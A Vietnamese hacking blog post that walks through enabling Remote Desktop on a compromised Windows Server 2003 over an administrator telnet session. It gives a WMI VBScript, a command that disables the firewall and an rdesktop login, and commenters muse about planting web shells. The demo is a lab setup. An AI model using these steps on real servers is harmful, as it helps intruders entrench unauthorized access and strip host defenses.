Home > HACKING - SECURITY > BẬT TÍNH NĂNG REMOTE DESKTOP TỪ XA

BẬT TÍNH NĂNG REMOTE DESKTOP TỪ XA

Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên.

Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3

B1. Trên Server kiểm tra remote desktop chưa bật.

picture001

B2. Trên máy Attacker, telnet vào Server

picture002

B3. Chuẩn bị sẵn file VBscript để enable Remote Desktop

picture003

Nội dung file VBScript remote.vbs

machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ‘ 0=off, 1=on

set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )

for each item in items

item.SetAllowTSConnections( value_to_set )

next

B4. Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server. Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại.

picture004

B5. Dùng lệnh dir kiểm tra

picture005

B6. Chạy file remote.vbs để bật remote desktop.

picture006

B7. Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe. (3389 là port Remote desktop)

picture007

B8. Trên Server kiểm tra tính năng Remote Desktop đã được bật

picture008

B9. Tắt firewall của Server

Sử dụng lệnh : Netsh firewall set opmode disable

picture009

B10. Từ máy attacker, chạy remote desktop client để kết nối với Server.

Sử dụng lệnh rdesktop [hostname]

picture010

B11. Nhập username/password của Administrator

picture011

B12. Truy cập thành công với quyền Administrators

picture012

Have a nice day smile_wink

Advertisements
Categories: HACKING - SECURITY
  1. Le
    November 20, 2008 at 8:48 pm

    Dù sao thì biết password của Administrator là khó nhất 😀

  2. DAO
    November 20, 2008 at 11:01 pm

    Ví dụ đây là 1 Server đang host 1 website bị lỗi, ta có thể chèn vào đó web shell thì sao nhỉ, hehe.

  3. Khanh
    November 22, 2008 at 11:06 am

    Hai ng nói j hok hiểu j hết…kaka( hok hieu ma nhieu` chuyen ghe..!)

  4. hoa
    January 30, 2010 at 11:27 am

    Ví dụ đây là 1 Server đang host 1 website bị lỗi, ta có thể chèn vào đó web shell thì sao nhỉ, hehe. <=== nghĩa là nếu có quyền trên hosting thì có khả năng biết được Acc Administrator của server sao Ếch, nếu đúng thì chỉ cần mua hosting của 1 server nào đó là ta hack đc nguyên con server á.

  5. TRAN
    March 20, 2010 at 10:21 am

    hi anh Hiếu, Ngưỡng mộ anh từ lâu, bài demo này rất hay nhưng sao không nói luôn dùng metasexploit khai thắc với lỗi gì vậy anh?thân

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: